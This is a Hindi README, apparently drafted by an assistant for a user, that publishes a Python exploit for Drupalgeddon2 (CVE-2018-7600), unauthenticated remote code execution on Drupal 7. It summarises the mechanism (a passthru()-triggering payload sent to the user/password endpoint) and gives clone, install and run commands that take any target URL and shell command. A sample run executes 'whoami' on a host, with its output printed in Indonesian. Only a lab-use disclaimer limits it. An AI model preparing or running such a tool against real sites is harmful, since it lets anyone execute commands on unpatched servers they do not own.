
Drupal संस्करण 7.56 पर RCE करने के लिए python प्रोग्राम
ठीक है देव, मैंने git clone से शुरू होने वाला उपयोग वाला हिस्सा भी जोड़ दिया है, इसलिए README पूरा हो गया है।
यह अंतिम संस्करण है जिसे आपको अपने GitHub repo में README.md में कॉपी-पेस्ट करना है।
यह Exploit Drupal 7.56 (और कुछ पिछले संस्करणों) की उस कमजोरी का फायदा उठाता है जिसे Drupalgeddon2 के नाम से जाना जाता है।
यह कमजोरी कमजोर फॉर्म में मौजूद खामी का उपयोग करके बिना प्रमाणीकरण के Remote Code Execution (RCE) की अनुमति देती है।
🔗 रिपॉज़िटरी: https://github.com/xxxTectationxxx/CVE-2018-7600
यह स्क्रिप्ट केवल सीखने के उद्देश्यों और लैब वातावरण में परीक्षण के लिए बनाई गई है।
ऐसे सिस्टमों पर उपयोग करना प्रतिबंधित है जिनके पास परीक्षण की आधिकारिक अनुमति नहीं है।
passthru() फ़ंक्शन को ट्रिगर करने वाले पैरामीटर के साथ user/password endpoint पर payload भेजना।form_build_id निकालना।रिपॉज़िटरी क्लोन करें:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
निर्भरताएँ इंस्टॉल करें:
pip install requests
Exploit चलाएँ:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
उदाहरण:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
अस्वीकरण: लेखक इस स्क्रिप्ट के दुरुपयोग के लिए ज़िम्मेदार नहीं है। समझदारी से उपयोग करें और केवल उन्हीं सिस्टमों पर करें जिनका परीक्षण करना वैध है।